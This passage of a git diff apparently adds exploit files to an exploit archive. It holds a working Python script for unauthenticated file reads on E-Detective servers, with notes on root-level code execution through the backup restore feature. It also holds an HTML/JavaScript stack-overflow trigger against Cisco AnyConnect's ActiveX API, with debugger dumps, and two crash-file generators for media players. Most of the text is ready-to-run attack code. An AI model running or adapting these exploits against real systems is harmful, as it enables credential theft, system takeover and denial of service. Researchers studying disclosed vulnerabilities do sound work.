+| .__/ \_/\_/ |_| |_|\___|\__,_|       
+| |                                    
+|_|                                    
+     _      _            _   _           
+    | |    | |          | | (_)          
+  __| | ___| |_ ___  ___| |_ ___   _____ 
+ / _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\
+| (_| |  __/ ||  __/ (__| |_| |\ V /  __/
+ \__,_|\___|\__\___|\___|\__|_| \_/ \___|
+"""
+
+argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.')
+argparser.add_argument('hostname', help='hostname to pwn')
+argparser.add_argument('file', help='path to file on server to grab')
+
+
+def encode(text):
+    encoded = ''
+
+    for i in range(len(text)):
+        encoded += chr(ord(text[i]) + 40)
+
+    encoded = base64.b64encode(encoded)
+    return encoded
+
+
+def poc(hostname, file):
+    return http_read('https://' + hostname + '/common/download.php?file=' + encode(file))
+
+
+def http_read(url):
+    return urllib2.urlopen(url).read()
+
+if __name__ == "__main__":
+    display_banner()
+    args = argparser.parse_args()
+    print poc(args.hostname, args.file)
+
+
+-----
+
+
+
+The /common/download.php in the web root allows for an unauthenticated
+user to read any file on the system that the web user has access to.
+This includes database credentials and any traffic intercepts captured
+by the system.
+
+The "file" parametre is "protected" by inadequate "cipher": base64
+followed by rot40, which is trivially reversible.
+
+2) Authenticated Remote Code Execution
+
+The restore feature in the "config backup" page extracts a .tar file
+encrypted with OpenSSL blowfish into the root directory (/) as root.
+
+The .tar file should be encrypted with the static key "/tmp/.charlie".
+Yes, that's the actual key - they pass the wrong argument to OpenSSL.
+They used -k instead of -kfile, thus the key is the path of the key file
+rather than the contents of the key file.
+
+This enables an attacker to upload a shell into the web root, or
+overwrite any system files such as /etc/shadow.
\ No newline at end of file
diff --git a/platforms/windows/dos/37287.html b/platforms/windows/dos/37287.html
new file mode 100755
index 000000000..48e863eae
--- /dev/null
+++ b/platforms/windows/dos/37287.html
@@ -0,0 +1,244 @@
+<!--
+
+Cisco AnyConnect Secure Mobility Client Remote Command Execution
+
+
+Vendor:  Cisco Systems, Inc.
+Product web page: http://www.cisco.com
+Affected version: 2.x
+                  3.0
+                  3.0.0A90
+                  3.1.0472
+                  3.1.05187
+                  3.1.06073
+                  3.1.06078
+                  3.1.06079
+                  3.1.07021
+                  3.1.08009
+                  4.0.00013
+                  4.0.00048
+                  4.0.00051
+                  4.0.02052
+                  4.0.00057
+                  4.0.00061
+                  4.1.00028
+
+Fixed in: 3.1.09005
+          4.0.04006
+          4.1.02004
+          4.1.02011
+
+Summary: Cisco AnyConnect Secure Mobility Solution empowers your
+employees to work from anywhere, on corporate laptops as well as
+personal mobile devices, regardless of physical location. It provides
+the security necessary to help keep your organizationâ€™s data safe
+and protected.
+
+Desc: The AnyConnect Secure Mobility Client VPN API suffers from
+a stack buffer overflow vulnerability when parsing large amount of
+bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function
+which resides in the vpnapi.dll library, resulting in memory corruption
+and overflow of the stack. An attacker can gain access to the system
+of the affected node and execute arbitrary code.
+
+==========================================================================
+
+(f48.10cc): Unknown exception - code 000006ba (first chance)
+(f48.10cc): C++ EH exception - code e06d7363 (first chance)
+(f48.10cc): C++ EH exception - code e06d7363 (first chance)
+(f48.10cc): Stack overflow - code c00000fd (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll - 
+eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
+eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
+vpnapi!ConnectIfcData::setConfigCookie+0x9195:
+748b6227 8500            test    dword ptr [eax],eax  ds:002b:00232000=00000000
+0:000> g
+(f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!)
+eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022
+eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
+vpnapi!ConnectIfcData::setConfigCookie+0x9195:
+748b6227 8500            test    dword ptr [eax],eax  ds:002b:00232000=00000000
+0:000> d edi
+088f0022  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0032  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0042  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0052  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0062  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0072  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0082  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0092  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+0:000> d edx
+088f0024  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0034  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0044  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0054  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0064  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0074  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0084  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+088f0094  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
+
+<12308000 B
+
+----
+
+>512150-512154 B
+
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\syswow64\RPCRT4.dll - 
+eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
+eip=75440fc4 esp=00193000 ebp=00193008 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
+RPCRT4!UuidCreate+0x835:
+75440fc4 56              push    esi
+0:000> g
+(1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!)
+eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738
+eip=75440fc4 esp=00193000 ebp=00193008 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
+RPCRT4!UuidCreate+0x835:
+75440fc4 56              push    esi
+0:000> d eax
+004d2384  46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74  Function: Client
+004d2394  49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e  IfcBase::getConn
+004d23a4  65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43  ectMgr.File: .\C
+004d23b4  6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70  lientIfcBase.cpp
+004d23c4  0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c  .Line: 2580.Call
+004d23d4  20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67   to getConnectMg
+004d23e4  72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65  r when not conne
+004d23f4  63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00  cted to Agent...
+0:000> d
+004d2404  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
+004d2414  00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
+004d2424  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+004d2434  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+004d2444  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+004d2454  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+004d2464  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+004d2474  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+0:000> d esp+1500
+00194500  00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00  ......(..<.t....
+00194510  ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00  ................
+00194520  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00194530  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00194540  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00194550  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00194560  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+00194570  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+==========================================================================
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Vendor status:
+
+[25.03.2015] Vulnerability discovered.
+[28.03.2015] Vendor contacted.
+[29.03.2015] Vendor responds asking more details.
+[13.04.2015] Sent details to the vendor.
+[15.04.2015] Asked vendor for status update.
+[15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact.
+[22.04.2015] Asked vendor for status update.
+[28.04.2015] No reply from the vendor.
+[04.05.2015] Asked vendor for status update.
+[05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation.
+[12.05.2015] Asked vendor for confirmation.
+[13.05.2015] Vendor resolved the issue, not sure for the release date.
+[14.05.2015] Asked vendor for approximate scheduled release date.
+[15.05.2015] Vendor informs that the defect is public (CSCuu18805).
+[19.05.2015] Asked vendor for release information.
+[19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2.
+[11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue.
+[13.06.2015] Public security advisory released.
+
+
+Advisory ID: ZSL-2015-5246
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php
+Vendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805
+
+
+25.03.2015
+
+-->
+
+
+<!DOCTYPE html>
+<html>
+<head>
+<title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title>
+</head>
+<body>
+<button onclick="O_o()">Launch</button>
+<object id="cisco" classid="clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"></object>
+<script language="JavaScript">
+
+function O_o() {
+  //targetFile = "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll"
+  //prototype  = "Sub ConnectVpn ( ByVal strHostNameOrAddress As String )"
+  //memberName = "ConnectVpn"
+  //progid     = "VpnApiLib.VpnApi"
+
+  var netv = Array(255712).join("ZS");
+  var push = //~~~~~~~~~~~~~~~~~~~~~~~~//
+
+                   /*(()()())*/
+                 "ZSZSZSZSZSZSZ"+
+                "SZSZSZSZSZSZSZS"+
+              "ZSZSZSZSZSZSZSZSZSZS"+
+            "ZSZSZSZSZSZSZSZSZSZSZSZS"+
+           "ZSZSZSZSZSZSZSZSZSZSZSZSZS"+
+           "ZSZSZSZ"+  "SZSZ"  +"SZSZSZ"+
+           "SZSZSZ"+   "SZSZ"  +"SZSZSZ"+
+            "SZSZS"+   "ZSZS"  +"ZSZSZ"+
+             "SZSZS"+  "ZSZS" +"ZSZSZ"+
+              "SZSZS"+"ZSZSZ"+"SZSZS"+
+             "SZSZSZSZSZSZSZSZSZSZSZS"+
+            "ZSZSZSZSZSZSZSZSZSZSZSZSZ"+
+        "SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
+      "ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ"+
+      "SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+
+      "ZSZSZSZ"    +"SZSZSZSZSZSZ"+    "SZSZ"+
+     "SZSZSZS"    +"ZSZSZSZSZSZSZS"+    "ZSZS"+
+     "ZSZSZSZ"    +"SZSZSZSZSZSZSZ"+    "SZSZ"+
+     "SZSZSZSZ"+  "SZSZSZSZSZSZSZSZS"+  "ZSZSZ"+
+     "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS"  +"ZSZ"+
+     "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS"  +"ZSZ"+
+      "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS"  +"ZSZ"+
+        "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS"  +"ZSZ"+
+         "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS"  +"ZSZ"+
+         "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS"  +"ZSZ"+
+       "SZS"+ "ZSZ"+ "SZS" +"ZSZ" +"SZS"  +"ZSZ"+
+      "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+    "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+    "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+      "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+        "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+           "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+             "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS"  +"ZSZ"+
+              "SZ"  +"SZ"  +"SZ"  +"SZ"  +"SZ"+  "SZ"+
+              "SZ"  +"SZ"  +"SZ"  +"SZ"  +"SZ"+  "SZ"+
+               "S"+  "Z"+  "S"+  "Z"+   "S"+    "Z"+
+              "S"+  "Z"+  "S"+  "Z"+   "S"+    "S"+
+             "S"+  "Z"+  "S"+  "Z"+   "S"+    "S";
+
+
+  var godeep = netv.concat(push);
+  cisco.ConnectVpn godeep
+}
+
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/dos/37299.py b/platforms/windows/dos/37299.py
new file mode 100755
index 000000000..0578ef0fe
--- /dev/null
+++ b/platforms/windows/dos/37299.py
@@ -0,0 +1,43 @@
+#!/usr/bin/python
+
+#[+] Author: SATHISH ARTHAR
+#[+] Exploit Title:  XtMediaPlayer - 0.93 Memory Corruption PoC
+#[+] Date: 16-06-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 
+#[+] Vendor:  http://downloads.sourceforge.net/project/xtmediaplayer/XtMediaPlayer/XtMediaPlayer_0.93_Win.rar 
+#[+] Sites: sathisharthars.wordpress.com
+#[+] Twitter: @sathisharthars
+#[+] Thanks:   offensive security (@offsectraining)
+
+
+ 
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"#  Title: XtMediaPlayer - 0.93 Memory Corruption PoC       #"
+print"#  Author: SATHISH ARTHAR                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "crash.wav"
+file = open(filename , "w")
+file.write(crash)
+print "\n Files Created!\n"
+file.close()
diff --git a/platforms/windows/dos/37300.py b/platforms/windows/dos/37300.py
new file mode 100755
index 000000000..2d2344cf1
--- /dev/null
+++ b/platforms/windows/dos/37300.py
@@ -0,0 +1,44 @@
+#!/usr/bin/python
+
+#[+] Author: SATHISH ARTHAR
+#[+] Exploit Title:  FinePlayer - 2.20 Memory Corruption PoC
+#[+] Date: 16-06-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 
+#[+] Vendor: http://www.gitashare.com
+#[+] Download: http://www.gitashare.com/downloads/fineplayer220.zip
+#[+] Sites: sathisharthars.wordpress.com
+#[+] Twitter: @sathisharthars
+#[+] Thanks:   offensive security (@offsectraining)
+
+
+ 
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"#  Title: FinePlayer - 2.20 Memory Corruption PoC          #"
+print"#  Author: SATHISH ARTHAR                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "crash.mp4"
+file = open(filename , "w")
+file.write(crash)
+print "\n Files Created!\n"
+file.close()